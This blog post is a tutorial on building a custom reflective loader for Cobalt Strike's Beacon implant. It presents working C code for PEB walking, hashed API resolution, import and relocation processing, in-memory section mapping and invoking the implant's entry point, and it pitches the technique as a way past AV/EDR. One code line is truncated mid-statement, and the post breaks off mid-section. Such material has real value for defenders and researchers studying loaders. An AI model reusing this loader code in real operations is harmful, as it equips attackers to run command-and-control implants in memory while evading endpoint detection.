Cobalt Strike - User Defined Reflective Loader Studies

Brain dump of information and insight I picked up learning about UDRLs. Nothing I talk about is new; many smarter people before me had figured it out already.

Introduction

What's up people! In this blog post we're gonna dive into Cobalt Strike's User Defined Reflective Loader (UDRL), what it is and how to develop your own :). I must proclaim that what I'm explaining here is NOT new. There are a couple of UDRLs out there already, with the most notable being Austin Hudson's TitanLdr, C5pider's KaynStrike, and Boku7's BokuLoader. Also, custom loaders have been around for a couple of decades, with one of the most notable being Stephen Fewer's Reflective DLL Injection technique.

This blog post is more of a brain dump of what I've learnt about UDRLs rather than an official tutorial, as there are still certain aspects I don't understand fully. However, I hope to clarify this concept more and maybe inspire people to look at this feature in Cobalt Strike (CS) and make their own UDRLs!

This topic is extensive and unfortunately I won't be able to explain every minor detail so some prior knowledge of the following concepts will most certainly aid you in understanding the topics discussed.

  • C Programming Language

  • Windows API

  • Windows Portable Executable

  • Reflective DLL Injection

  • Windows Internals

  • Cobalt Strike

  • Assembly Language

Don't worry though, I will be providing a lot of resources throughout this blog post to help you understand these concepts further!

User Defined Reflective Loader

So, what is a User Defined Reflective Loader? First, we should probably take several steps back and get a high level overview of:

  1. Portable Executables

  2. Reflective DLL Injection

Portable Executables

What is a Portable Executable (PE)? Essentially a PE, in relation to the Windows operating system, is the native Win32 file format. If you are a Windows user you may have seen some of these file formats on your PC/Laptop, for example .exe and .dll files are both PEs.

But what is the point of PEs? The PE acts as a data structure that tells the Windows OS loader what information is required to manage the wrapped executable code. This information can be used for dynamic library references for linking, API export, import tables, resource management data etc. In essence the PE is like a directory filled with information regarding the file format being loaded from disk into memory.

The PE has many sections within it, each holding its own important information (except for the DOS header, it's kinda useless :p) regarding our file format. Here is an example of a PE's layout -

At first glance it looks super confusing, and I'm not gonna lie...it is super confusing when you first learn about PEs lol. We'll be going over the sections and headers highlighted in the above image during the coding walkthrough portion of this blog!

Reflective DLL Injection

Now, some understanding of process injection in general will help if you want to understand this concept, but I will do my best to simplify it as much as I can :). Reflective DLL Injection (RDI) is a technique invented by Stephen Fewer as previously stated, however the concept that underpins this technique is known as Manual Mapping (MM), which from my research has been around since the late 90's, early 00's!

So what is RDI? RDI is the technique of creating and loading a Dynamic-Link Library (DLL) in memory to avoid touching the disk. This is a useful technique in relation to malware development because it means AV/EDR products will have a harder time detecting your payload unless they are meticulously scanning memory.

So how is this technique done? Well, when you need to load a DLL in Windows, you call LoadLibrary, which takes the file path of a DLL and loads it into memory. However, in our case we're not trying to load from disk. We want to load from memory, and LoadLibrary doesn't do that. So we have to create our own LoadLibrary functionality.

So essentially for RDI we need to load and execute a DLL in memory.

Here's an image representation of RDI -

Again, I'm not gonna lie, this topic can be confusing when first learning it and trying to represent the concept in an image is well...not that helpful tbh :|, but here it is nonetheless ;p.

So after this massive digression we come full circle to our initial question...

What is a User Defined Reflective Loader?

Hopefully, after my shoddy explanations of PE and RDI you should have an inkling of what a UDRL is and does. Essentially, it is CS allowing you (the operator) the functionality to implement the creation and use of a custom reflective loader within their C2 framework. As an operator this allows us a huge platform to develop a custom payload or post-exploitation beacon with cool features and functionality.

Sounds cool right? But how do we make one?

UDRL Development

So as we've ascertained we need to develop a DLL that loads itself and executes itself in memory. This procedure can be done via shellcode. Shellcode is usually written in Assembly language but doing so is a tedious and tricky task which can go wrong easily. Fortunately for me, people way smarter than myself have developed ways of implementing this concept in C and taking advantage of the C compiler. The concepts discussed in this blog have been documented by security researchers such as Hasherezade in her From a C project, through assembly, to shellcode whitepaper, and Modexp's Shellcode: In-Memory Execution of DLL. Implementations of these concepts can also be found within the KaynStrike and TitanLdr UDRLs.

Resolving API Addresses in Memory

When a PE is loaded via disk, all API calls referenced in the code can be found in the Import Address Table (IAT) and Export Address Table (EAT). These tables are created by the linker during compilation. Resolving these tables is done at runtime and handled by default but we don't have that luxury unfortunately. We must resolve API calls by ourselves.

The API functions can be retrieved by using the Process Environment Block (PEB) which is created at a process' runtime. On execution of the UDRL shellcode in our target process, we should be able to locate the PEB of the target, and then use that reference to search for the DLLs that contain the APIs we wish to load!

Within the PEB there are a lot of structures which contain information about the running process. However, the structure we're most concerned with is the Ldr structure.

We can gain access to the PEB via the structure that points to it, called the Thread Environment Block (TEB). The TEB is accessed via segment registers in assembly. For 32 bit it is the FS register and for 64 bit it is the GS register. The offsets of the PEB pointer within the TEB are 0x30 (32bit) and 0x60 (64bit).

So, in order to access the PEB via C code we can setup a macro to the particular offset relative to the segment register pointing to the TEB.

#ifdef _WIN64
#define PebLdr __readgsqword(0x60)
#else
#define PebLdr __readfsdword(0x30)
#endif

Now, in the Ldr structure discussed earlier there is a linked list which will give us the names of all the DLLs loaded in the memory of a running process. This list can be walked in order for us to check if the DLL in the list is the DLL we need for our APIs. The code below demonstrates this process.

GRP_SEC(E) PVOID LoadPebModule(DWORD Hash) {

	PLDR_DATA_TABLE_ENTRY	  ModuleLdr = NULL; 
	PLIST_ENTRY		  PebModule = NULL; 
	PLIST_ENTRY		  NextEntry = NULL;

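	/* Head of the loader's doubly linked list of loaded modules */
	PebModule = &((PPEB)PebLdr)->Ldr->InLoadOrderModuleList; 

	NextEntry = PebModule->Flink; 

	do {
		/* InLoadOrderLinks is the first member, so the list entry doubles as the record */
		ModuleLdr = (PLDR_DATA_TABLE_ENTRY)NextEntry;

		/* Compare the hash of the module's base name with the hash we were given */
		if (HashFunction(ModuleLdr->BaseDllName.Buffer, ModuleLdr->BaseDllName.Length) == Hash) {
			
			return ModuleLdr->DllBase;
		}
		
		NextEntry = NextEntry->Flink;

	} while (PebModule != NextEntry); /* stop once we are back at the list head */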

	return NULL; 
}

Essentially what the code above is doing is accessing one of the linked lists within the Ldr structure called InLoadOrderModuleList. We can assign our NextEntry variable to the Flink member of this list and walk through the list, checking each listed DLL's name and length against a hash representation of the DLL we want. The ModuleLdr variable will be a pointer to the LDR_DATA_TABLE_ENTRY structure, which is NTDLL's record of how a DLL is loaded into a process. If our hash and DLL in the list are a match, success! We can then return the DLL's base address via the DllBase member in LDR_DATA_TABLE_ENTRY.
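The HashFunction used above isn't shown in this post, so here is a minimal sketch of what such a routine could look like. It is a djb2-style hash written in portable C; the name hash_bytes, the uppercase folding, and the rule that a length of 0 means "NUL-terminated string" are my own assumptions for illustration, not necessarily what any particular loader does.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical djb2-style hash. When len is 0 the input is treated as a
 * NUL-terminated ASCII string; otherwise exactly len bytes are read and
 * zero bytes are skipped, so UTF-16LE text hashes like its ASCII form. */
uint32_t hash_bytes(const void *input, size_t len)
{
    const unsigned char *p = (const unsigned char *)input;
    uint32_t hash = 5381;

    for (size_t i = 0; len ? (i < len) : (p[i] != 0); i++) {
        unsigned char c = p[i];

        if (c == 0)
            continue;                        /* high byte of a UTF-16LE character */
        if (c >= 'a' && c <= 'z')
            c = (unsigned char)(c - 0x20);   /* fold to upper case */

        hash = ((hash << 5) + hash) + c;     /* hash * 33 + c */
    }
    return hash;
}
```

Skipping zero bytes is what lets the same routine hash the wide-character module names found in the PEB and the ASCII export names found in the EAT, and folding case means ntdll.dll and NTDLL.DLL give the same value.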

Looking Up Exports

Once we have the base address of our DLL (in our case ntdll.dll), we need to find the address of the APIs we'll be using within our code. For our UDRL the following APIs will be used -

  • RtlAnsiStringToUnicodeString

  • NtAllocateVirtualMemory

  • NtProtectVirtualMemory

  • LdrGetProcedureAddress

  • RtlFreeUnicodeString

  • RtlInitAnsiString

  • LdrLoadDll

We can find these functions via the EAT. In order to do this we need to traverse the PE. Functions are exported by a DLL in two ways, by name or by ordinal. The EAT is accessed through the IMAGE_EXPORT_DIRECTORY within the IMAGE_DATA_DIRECTORY.

If you're not familiar with the PE format I'm sure at this stage you're thinking what on earth is going on! No problem, this is expected and understanding will come with time lol. However, I'll do my best to explain by walking through the code of the function that will load our exported functions. Below is an example of the code.

GRP_SEC(E) PVOID LoadExports(PVOID ZenImage, DWORD Hash) {

	PIMAGE_EXPORT_DIRECTORY		ExportDir	= NULL; 
	PIMAGE_DATA_DIRECTORY		DataDir		= NULL;
	PIMAGE_NT_HEADERS			NtHeaders	= NULL; 
	PIMAGE_DOS_HEADER			DosHeader	= NULL; 

	PDWORD	NameAddress		= NULL;
	PDWORD	FuncAddress		= NULL;
	PWORD	OrdAddress		= NULL;

	DosHeader	= (PIMAGE_DOS_HEADER)ZenImage; 
	

	NtHeaders	= CONVERT(PIMAGE_NT_HEADERS, DosHeader, DosHeader->e_lfanew); 
	

	DataDir		= &NtHeaders->OptionalHeader.DataDirectory[0]; 

	if (DataDir->VirtualAddress) {

		ExportDir	= CONVERT(PIMAGE_EXPORT_DIRECTORY, DosHeader, DataDir->VirtualAddress); 
		

		NameAddress 	= CONVERT(PDWORD, DosHeader, ExportDir->AddressOfNames);
	

		FuncAddress 	= CONVERT(PDWORD, DosHeader, ExportDir->AddressOfFunctions); 
		

		OrdAddress	= CONVERT(PWORD, DosHeader, ExportDir->AddressOfNameOrdinals);  
	

		/* Bound the loop by NumberOfNames so a missing export ends the search */
		for (DWORD Index = 0; Index < ExportDir->NumberOfNames; Index++) {

			if (HashFunction(CONVERT(PVOID, DosHeader, NameAddress[Index]), 0) == Hash) {

				return CONVERT(PVOID, DosHeader, FuncAddress[OrdAddress[Index]]); 
			}
		}
	}

	return NULL; 
}

So, this is where that image presented in the Portable Executables section of the blog comes in handy. First thing we need to do is get the start of our image via IMAGE_DOS_HEADER. Basically all PE files start with the DOS header, which occupies the first 64 bytes of the file. This header really doesn't do much except give us the e_lfanew member, which holds the offset of the PE/NT header portion of our PE.

The PE header is the general term for a structure named IMAGE_NT_HEADERS. This structure contains important information used by the loader. Within IMAGE_NT_HEADERS there are 3 members. What we're focused on right now is the OptionalHeader member. The name is kinda misleading as it is most certainly not optional with regards to its importance in the PE :p! The OptionalHeader is a large structure within the PE, taking up 224 bytes in a 32-bit image (240 bytes in a 64-bit one), and 128 of those bytes belong to the DataDirectory!

In the DataDirectory we have a number of...directories lol. There are 16 IMAGE_DATA_DIRECTORY structures. Each of these relates to a structure within the PE file. The structure we're interested in is the IMAGE_EXPORT_DIRECTORY, which is described by the first entry within the DataDirectory.

So essentially this portion of code below from our function is just again walking the PE in order to get us to our export directory structure. The 0 you see is just the index of where the export directory is within the list, 0 == first because you know...computers like to be confusing!

DosHeader	= (PIMAGE_DOS_HEADER)ZenImage; 

NtHeaders	= CONVERT(PIMAGE_NT_HEADERS, DosHeader, DosHeader->e_lfanew);  

DataDir		= &NtHeaders->OptionalHeader.DataDirectory[0]; 
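To make the DOS header to NT header hop a bit more concrete, here's a small sketch that does the same walk on a plain byte buffer instead of the Windows structures. The offsets (the MZ magic at 0x00, e_lfanew at 0x3C, and the PE\0\0 signature) come from the PE format; the function name find_nt_headers and its bounds checks are made up for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Returns the offset of the NT headers inside image, or -1 if the buffer
 * does not look like a PE file. Hypothetical helper for illustration. */
long find_nt_headers(const uint8_t *image, size_t size)
{
    uint32_t e_lfanew;

    /* The DOS header is 64 bytes long and starts with the "MZ" magic */
    if (size < 0x40 || image[0] != 'M' || image[1] != 'Z')
        return -1;

    /* e_lfanew is a little-endian 32-bit value at offset 0x3C */
    e_lfanew = (uint32_t)image[0x3C]
             | ((uint32_t)image[0x3D] << 8)
             | ((uint32_t)image[0x3E] << 16)
             | ((uint32_t)image[0x3F] << 24);

    /* The 4-byte signature must fit inside the buffer */
    if (e_lfanew > size - 4)
        return -1;

    if (memcmp(image + e_lfanew, "PE\0\0", 4) != 0)
        return -1;

    return (long)e_lfanew;
}
```

The loader code in this post skips these sanity checks because it already knows it is looking at a valid image, but they are handy when experimenting with PE files on disk.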

Now once we reach the IMAGE_EXPORT_DIRECTORY we need to access the members within it. Each entry within the DataDirectory contains the VirtualAddress and Size of the data structure in question. To access the export structure we need to check if the VirtualAddress is valid and, if that's the case, point our declared variables at the important members. In our situation the members we need are -

AddressOfFunctions - A relative virtual address (RVA) that points to an array of addresses for functions in a DLL.

AddressOfNames - An RVA that points to an array of names of the functions in a DLL.

AddressOfNameOrdinals - An RVA that points to a 16 bit array that contains the ordinals of the named functions within a DLL.

Essentially our IMAGE_EXPORT_DIRECTORY points to three arrays. What we want to do is iterate through the names array, comparing the hash of each name against the hash of the function we want. If we get a match at position Index, we read the Index-th element of the array pointed to by OrdAddress, which gives us the position of that export in the array pointed to by FuncAddress. The element of FuncAddress at that position is the RVA of the function, and adding it to the base address of the PE image gives us the pointer the function returns.
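The name, ordinal, and function arrays are easier to see on toy data. The sketch below is a simplified stand-in, not the real export directory: the struct mock_exports and find_export_rva are invented names, and plain C strings are compared with strcmp where the loader would hash names reached through RVAs.

```c
#include <stdint.h>
#include <string.h>

/* Simplified stand-in for the three export arrays. Real images store RVAs
 * to the name strings; plain C strings keep the sketch short. */
struct mock_exports {
    uint32_t        number_of_names;
    const char    **names;      /* plays the role of AddressOfNames        */
    const uint16_t *ordinals;   /* plays the role of AddressOfNameOrdinals */
    const uint32_t *functions;  /* plays the role of AddressOfFunctions    */
};

/* Returns the RVA of the named export, or 0 when it is not present. */
uint32_t find_export_rva(const struct mock_exports *exp, const char *wanted)
{
    for (uint32_t i = 0; i < exp->number_of_names; i++) {
        if (strcmp(exp->names[i], wanted) == 0) {
            /* The ordinal entry is an index into the function array */
            uint16_t slot = exp->ordinals[i];
            return exp->functions[slot];
        }
    }
    return 0;
}
```

Note that the name index and the function index are generally different, which is why the ordinal array sits in between them.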

Looking Up Imports

Next step is processing the IAT of our image loaded into memory. The IAT is a table that contains the addresses of functions that are imported from other DLLs. When an image is loaded into memory and executed, the IAT is used to resolve the addresses of these imported functions so that the image can call them.

The purpose of the function below is to update the IAT with the actual addresses of the imported functions. This is necessary because when the image is compiled, the IAT entries only reference the names (or ordinals) of the imported functions, not their actual addresses. When the image is loaded into memory, the IAT must be updated with the correct addresses of the imported functions so that the image can call them.

Let's step through some code to gain a better understanding.

First thing we need to do is resolve those functions previously mentioned in the Looking Up Exports section. This will be done using our LoadPebModule and LoadExports functions.

Resolve.Dll.Ntdll = LoadPebModule(NTDLL_HASH);

	Resolve.Function.RtlAnsiStringToUnicodeString	= LoadExports(Resolve.Dll.Ntdll, RTLANSISTRINGTOUNICODESTRING_HASH);
	Resolve.Function.LdrGetProcedureAddress		= LoadExports(Resolve.Dll.Ntdll, LDRGETPROCEDUREADDRESS_HASH);
	Resolve.Function.RtlFreeUnicodeString		= LoadExports(Resolve.Dll.Ntdll, RTLFREEUNICODESTRING_HASH);
	Resolve.Function.RtlInitAnsiString		= LoadExports(Resolve.Dll.Ntdll, RTLINITANSISTRING_HASH);
	Resolve.Function.LdrLoadDll			= LoadExports(Resolve.Dll.Ntdll, LDRLOADDLL_HASH);

Next we need to loop through the Import Directory, which is an array of IMAGE_IMPORT_DESCRIPTOR structures. These structures contain information about the DLLs our PE file imports functions from.

typedef struct _IMAGE_IMPORT_DESCRIPTOR {
    union {
        DWORD   Characteristics;
        DWORD   OriginalFirstThunk;
    } DUMMYUNIONNAME;
    DWORD   TimeDateStamp;
    DWORD   ForwarderChain;
    DWORD   Name;
    DWORD   FirstThunk;
} IMAGE_IMPORT_DESCRIPTOR, *PIMAGE_IMPORT_DESCRIPTOR;

The three fields we're interested in are -

    • OriginalFirstThunk - An RVA to the table that identifies each imported function by name or ordinal.

    • Name - An RVA to the null terminated name of the module to import APIs from.

    • FirstThunk - An RVA to the table that will hold the actual addresses of the functions.

Each descriptor contains RVAs that point to arrays of IMAGE_THUNK_DATA structures. Each entry represents information about one imported API.

typedef struct _IMAGE_THUNK_DATA32 {
    union {
        DWORD ForwarderString;      // PBYTE 
        DWORD Function;             // PDWORD
        DWORD Ordinal;
        DWORD AddressOfData;        // PIMAGE_IMPORT_BY_NAME
    } u1;
} IMAGE_THUNK_DATA, * PIMAGE_THUNK_DATA;

First thing to do is call the RtlInitAnsiString function to initialise the name of the DLL. The name of the DLL is stored in the Name field of the import directory entry and the RtlInitAnsiString function initializes an ANSI string with a pointer to this data.

Next we call the RtlAnsiStringToUnicodeString function to convert the ANSI string to a Unicode string. This is necessary because the LdrLoadDll function, which is called later in the loop, expects a Unicode string as its third argument (the DLL name). It's worth noting that LdrLoadDll is the ntdll function that LoadLibrary ends up calling under the hood.

for (ImportDesc = (PVOID)ImportDir; ImportDesc->Name != 0; ImportDesc++) {

		Name = CONVERT(PVOID, ZenImage, ImportDesc->Name); 

		Resolve.Function.RtlInitAnsiString(&AniDllName, Name); 

		Status = Resolve.Function.RtlAnsiStringToUnicodeString(&UniDllName, &AniDllName, TRUE);

We then call our LdrLoadDll function to load the DLL into memory. This function returns a handle to the DLL in the DllHandle variable.

Once we have a handle to our DLL we need to initialize two pointers to the start of the OriginalFirstThunk (OFT) and the FirstThunk (FT) tables for the DLL, respectively. These tables contain the entries for the functions that the image imports from the DLL. The OFT identifies the imported functions by name or ordinal as they appeared in the image's import table, while the FT will contain the actual addresses of the imported functions in memory.

if (NT_SUCCESS(Status)) {

    Status = Resolve.Function.LdrLoadDll(NULL, 0, &UniDllName, &DllHandle); 

    if (NT_SUCCESS(Status)) {

	OrgThunk	= CONVERT(PIMAGE_THUNK_DATA, ZenImage, ImportDesc->OriginalFirstThunk); 
				

	FirstThunk	= CONVERT(PIMAGE_THUNK_DATA, ZenImage, ImportDesc->FirstThunk); 

Now we can iterate through the entries in the OFT and FT tables. For each entry, we check whether it specifies an imported function by name or by ordinal. If the entry specifies an imported function by name, we call the LdrGetProcedureAddress function (this is the function that GetProcAddress calls when invoked) with the name to look up the address of the function in the DLL. If the entry specifies an imported function by ordinal, we call LdrGetProcedureAddress with the ordinal instead. In both cases the corresponding entry in the FT table is updated with the resolved address.

When the loop finishes, the FT table will contain the correct addresses of all the imported functions from the DLL, and the image will be able to call these functions when it is executed.

while (OrgThunk->u1.AddressOfData != 0) {

     if (IMAGE_SNAP_BY_ORDINAL(OrgThunk->u1.Ordinal)) {

	Status = Resolve.Function.LdrGetProcedureAddress(DllHandle, 0, IMAGE_ORDINAL(OrgThunk->u1.Ordinal), &FuncAddr); 

		if (NT_SUCCESS(Status)) {

		   FirstThunk->u1.Function = FuncAddr; 
		}
     }
     else {

	    ImportName = CONVERT(PIMAGE_IMPORT_BY_NAME, ZenImage, OrgThunk->u1.AddressOfData); 
						
	    Resolve.Function.RtlInitAnsiString(&AniDllName, (PVOID)ImportName->Name);

	    Status = Resolve.Function.LdrGetProcedureAddress(DllHandle, &AniDllName, 0, &FuncAddr); 

	   if (NT_SUCCESS(Status)) {

		FirstThunk->u1.Function = FuncAddr;
	   }

     }

	OrgThunk++; 

	FirstThunk++; 
}

Lastly, the loop then calls the RtlFreeUnicodeString function to free the memory used by the Unicode string.
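The by-name versus by-ordinal check boils down to a single bit test. Here's a small sketch of what IMAGE_SNAP_BY_ORDINAL and IMAGE_ORDINAL do for a 64-bit thunk, written without the Windows headers. The helper names are mine; the bit layout (top bit as the ordinal flag, low 16 bits as the ordinal, low 31 bits as the hint/name RVA) follows the PE format.

```c
#include <stdbool.h>
#include <stdint.h>

/* On 64-bit images the top bit of a thunk marks an import by ordinal
 * (the Windows headers call this IMAGE_ORDINAL_FLAG64). */
#define ORDINAL_FLAG64 0x8000000000000000ULL

/* True when the thunk describes an import by ordinal. */
bool thunk_is_ordinal(uint64_t thunk)
{
    return (thunk & ORDINAL_FLAG64) != 0;
}

/* The ordinal number lives in the low 16 bits. */
uint16_t thunk_ordinal(uint64_t thunk)
{
    return (uint16_t)(thunk & 0xFFFF);
}

/* Otherwise the low 31 bits are the RVA of the hint/name entry. */
uint32_t thunk_name_rva(uint64_t thunk)
{
    return (uint32_t)(thunk & 0x7FFFFFFF);
}
```

In the loader, the RVA from the last helper is what gets added to the image base to reach the IMAGE_IMPORT_BY_NAME entry.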

Relocations

Some quick theory to explain what we're doing here. When a PE file is created by the linker it has to make an assumption about where the file will be mapped into memory. This assumption leads the linker to hard code addresses of code and data items within the compiled PE file. If the PE file is not loaded at the base address hard-coded into the file...we have a problem. In order to circumvent this issue the locations of the hard-coded addresses are stored in the .reloc section of the PE. This section allows the PE loader to fix the addresses in the loaded image.

The entries within the .reloc section are called base relocations as they depend on the base address of the loaded image. This is just a list of locations in the image. The base relocation entries are allocated in a series of variable length chunks, with each chunk representing the relocations for one 4KB page in the image.

So, for our function we need to process a directory of image base relocations for an image in memory. The directory is an array of IMAGE_BASE_RELOCATION structures.

typedef struct _IMAGE_BASE_RELOCATION {
  DWORD   VirtualAddress;
  DWORD   SizeOfBlock;
} IMAGE_BASE_RELOCATION, *PIMAGE_BASE_RELOCATION;

The VirtualAddress field specifies the virtual address of the first byte of the page where the base relocations are applied. The SizeOfBlock field specifies the size of the block, in bytes, including the IMAGE_BASE_RELOCATION structure and all of the IMAGE_RELOC structures that follow it.

The IMAGE_RELOC structure is defined as follows:

typedef struct _IMAGE_RELOC {
    WORD Offset : 12;
    WORD Type : 4;
} IMAGE_RELOC, * PIMAGE_RELOC;

First we need to initialise a pointer to the start of the relocation directory, then initialise a variable to the difference between the image base address of where the file is loaded in memory and the image base address that was specified when the image was compiled. This difference is referred to as the delta.

ImgBaseReloc	= (PVOID)BaseRelocDir; 

Delta		= (PVOID)((ULONG_PTR)ZenImage - (ULONG_PTR)ImageBase);

The function then enters a loop that iterates over all of the blocks in the relocation directory. For each block, it initializes a pointer to the start of the block and enters another loop that iterates over all of the relocations in the block.

for (; ImgBaseReloc->VirtualAddress != 0; ImgBaseReloc = (PVOID)Relocation) {

	Relocation = (PIMAGE_RELOC)(ImgBaseReloc + 1); 

	for (; (PBYTE)Relocation != CONVERT(PBYTE, ImgBaseReloc, ImgBaseReloc->SizeOfBlock); R

For each relocation, the function reads the Type field and applies the relocation based on the value of this field. There are several different types of relocations that can be applied, but the function only handles three of them.

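IMAGE_REL_BASED_DIR64 and IMAGE_REL_BASED_HIGHLOW are combined within a macro called IMAGE_REL_TYPE, so the same case handles whichever one applies to the architecture we compile for. The third type, IMAGE_REL_BASED_ABSOLUTE, is just used as padding so the next relocation block is aligned on a 4-byte boundary, which means there is nothing to fix up for it.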

switch (Relocation->Type) {

	case IMAGE_REL_BASED_ABSOLUTE:

		break; 

        case IMAGE_REL_TYPE:

             *(ULONG_PTR*)((PBYTE)ZenImage + ImgBaseReloc->VirtualAddress + Relocation->Offset) += (ULONG_PTR)Delta; 

				
	}
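Here is a self-contained sketch of the same fix-up logic running on an ordinary byte buffer, which makes it easy to experiment with. The helper name apply_reloc_block and its parameter list are invented for this example; the type values (0 for ABSOLUTE, 10 for DIR64) and the 4-bit type / 12-bit offset split come from the PE format. In a real block the number of entries would be (SizeOfBlock - 8) / 2, since the block header is 8 bytes and each entry is 2 bytes.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define REL_ABSOLUTE 0   /* IMAGE_REL_BASED_ABSOLUTE: padding, nothing to do */
#define REL_DIR64    10  /* IMAGE_REL_BASED_DIR64: 64-bit address fix-up     */

/* Applies one block of relocation entries to image and returns how many
 * fix-ups were made. page_rva plays the role of VirtualAddress. */
size_t apply_reloc_block(uint8_t *image, uint32_t page_rva,
                         const uint16_t *entries, size_t count, uint64_t delta)
{
    size_t applied = 0;

    for (size_t i = 0; i < count; i++) {
        unsigned type   = entries[i] >> 12;     /* high 4 bits */
        unsigned offset = entries[i] & 0x0FFF;  /* low 12 bits */

        if (type != REL_DIR64)
            continue;                           /* skips REL_ABSOLUTE padding */

        uint64_t value;
        uint8_t *target = image + page_rva + offset;

        memcpy(&value, target, sizeof value);   /* avoids unaligned access */
        value += delta;
        memcpy(target, &value, sizeof value);
        applied++;
    }
    return applied;
}
```

For example, a stored address of 0x180001234 with a delta of 0x10000 becomes 0x180011234 after the block is applied.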
 

DLL Entry

Finally! We've got all the components necessary for loading a PE. Our final step is to set up a main function that will process all this information and execute our UDRL in memory. The process behind our main function requires the following steps.

  • Allocate memory for size of our image

  • Copy each section to our new allocated memory space

  • Initialise import table

  • Apply relocations

  • Set the memory permission to be executable

  • Execute entry point of DLL

First step is resolving a couple more functions from the ntdll library, NtAllocateVirtualMemory and NtProtectVirtualMemory.

Resolve.Dll.Ntdll = LoadPebModule(NTDLL_HASH);

Resolve.Function.NtAllocateVirtualMemory	= LoadExports(Resolve.Dll.Ntdll, NTALLOCATEVIRTUALMEMORY_HASH);

Resolve.Function.NtProtectVirtualMemory		= LoadExports(Resolve.Dll.Ntdll, NTPROTECTVIRTUALMEMORY_HASH);

As our code is being injected into memory we first need to find ourselves in the target process' memory space. The CODE_END() macro calculates the end address of the code section relative to the address of the GetIp (instruction pointer) symbol in memory. Typecasting the result of this macro to a pointer to IMAGE_DOS_HEADER should give us the starting point of our PE in memory. This technique is used in TitanLdr.

#define CODE_END( x )	(ULONG_PTR)( GetIp( ) + 11 )

Next, the function obtains the size of our PE image via SizeOfImage and allocates a region of memory of that size with NtAllocateVirtualMemory.

DosHeader = (PIMAGE_DOS_HEADER)CODE_END();

NtHeaders = CONVERT(PIMAGE_NT_HEADERS, DosHeader, DosHeader->e_lfanew);

ZenImageSize = NtHeaders->OptionalHeader.SizeOfImage; 

Status = Resolve.Function.NtAllocateVirtualMemory(NtCurrentProcess(), &ZenBaseAddress, 0, &ZenImageSize, MEM_COMMIT, PAGE_READWRITE);

We then need to loop through all the sections of a PE file and copy their contents into a new location in memory. The PE file is made up of several sections that each contain different types of data, such as code, data, or resources.

The IMAGE_FIRST_SECTION macro returns a pointer to the first section of the PE file, NumberOfSections is a field that specifies the total number of sections in the file. The loop iterates through each section using an index variable Index, which starts at 0 and goes up to one less than the number of sections.

Inside the loop we need to copy the contents of each section from its location in the original PE file to a new location in memory. The destination address is calculated by adding the section's virtual address to the base address of the new memory region, and the source address is calculated by adding the section's raw data offset to the base address of the original PE file. The size of the data to copy is specified by the SizeOfRawData field of the section header.

Overall, this code is essentially copying the entire contents of the original PE file into a new memory region, with each section being placed at its correct virtual address.

if (NT_SUCCESS(Status)) {

SecHeader = IMAGE_FIRST_SECTION(NtHeaders);

SIZE_T Index = 0;
while (Index < NtHeaders->FileHeader.NumberOfSections) {

  MemCpy
      (

       (PBYTE)ZenBaseAddress + SecHeader[Index].VirtualAddress,
       (PBYTE)DosHeader + SecHeader[Index].PointerToRawData,
       SecHeader[Index].SizeOfRawData
      );

      Index++;
}
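The same copy loop can be tried out on toy buffers. In the sketch below, struct mock_section only carries the three section-header fields the loop reads, and map_sections is a hypothetical name. It is meant to show how the raw file offset and the virtual address differ, not to replace the loader code.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Only the three section-header fields the copy loop needs. */
struct mock_section {
    uint32_t virtual_address;      /* where the section lives once mapped */
    uint32_t pointer_to_raw_data;  /* where it sits in the raw file       */
    uint32_t size_of_raw_data;     /* how many bytes to copy              */
};

/* Copies every section from its raw file offset to its virtual address. */
void map_sections(uint8_t *mapped, const uint8_t *raw,
                  const struct mock_section *sections, size_t count)
{
    for (size_t i = 0; i < count; i++) {
        memcpy(mapped + sections[i].virtual_address,
               raw + sections[i].pointer_to_raw_data,
               sections[i].size_of_raw_data);
    }
}
```

Sections that are packed back to back in the file end up spread out in the mapped image, which is why the destination buffer has to be SizeOfImage bytes rather than the size of the file.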

The next step is processing the IAT and relocation table in the input PE image. These need to be accessed through the IMAGE_DATA_DIRECTORY discussed previously.

DataDir = &NtHeaders->OptionalHeader.DataDirectory[1];

if (DataDir->VirtualAddress) {

  LoadImports((PVOID)ZenBaseAddress, CONVERT(PVOID, ZenBaseAddress, DataDir->VirtualAddress));
}

DataDir = &NtHeaders->OptionalHeader.DataDirectory[5];

if (DataDir->VirtualAddress) {

  LoadRelocations((PVOID)ZenBaseAddress, CONVERT(PVOID, ZenBaseAddress, DataDir->VirtualAddress), NtHeaders->OptionalHeader.ImageBase);
}

The initial protection on our memory pages is PAGE_READWRITE, so we need to change it before we can actually execute our DLL in memory. Once that is done we retrieve the address of the entry point function from AddressOfEntryPoint and call it twice: first with a reason of 1 (DLL_PROCESS_ATTACH) and then with a reason of 4, which appears to be the value Beacon uses as its signal to start running. The entry point function is responsible for setting up the remaining program state and transferring control to the program's main code.

SecSize = SecHeader->SizeOfRawData;

Status = Resolve.Function.NtProtectVirtualMemory(NtCurrentProcess(), &ZenBaseAddress, &SecSize, PAGE_EXECUTE_READ, &Protections);

if (NT_SUCCESS(Status)) {

  ZenEntry = CONVERT(ZenDllMain, ZenBaseAddress, NtHeaders->OptionalHeader.AddressOfEntryPoint);
  ZenEntry(SYMBOL(Start), 1, NULL);
  ZenEntry(SYMBOL(Start), 4, NULL);
}

The ZenEntry variable represents DllMain which is an entry point into a DLL. When the system starts or terminates a process or thread, it calls the entry-point function for each loaded DLL using the first thread of the process.

BOOL WINAPI DllMain(
  _In_ HINSTANCE hinstDLL,
  _In_ DWORD     fdwReason,
  _In_ LPVOID    lpvReserved
);

The SYMBOL macro calculates the address of a symbol x, which in our case is a function called Start, relative to the address of the GetIp symbol in memory. Both Start and GetIp are essentially Assembly stubs we can combine with our C code. Again, this concept is used in TitanLdr.

#define SYMBOL( x )      ( ULONG_PTR )( GetIp( ) - ( ( ULONG_PTR ) & GetIp - ( ULONG_PTR ) x ) )

Combining C & Assembly

Woah, that was a lot of info right? If you're still with us, I salute you :). If not, no worries I completely understand why, lmao!

So it should be stated that I am no Assembly wizard but will do my best to provide an explanation regarding the code and concepts being applied in this section.

Section Alignment

Now, when initialising and declaring our functions there will be a GRP_SEC(x) attribute before the function type and name...why? Essentially the Windows PE has a functionality called Grouped Sections. This allows multiple sections to be treated as a single unit with respect to certain operations.

In a PE file, sections are used to store various types of data, such as code, resources, and data. When the file is loaded into memory, the sections are mapped into memory as separate regions, with each section having its own address and protection attributes.

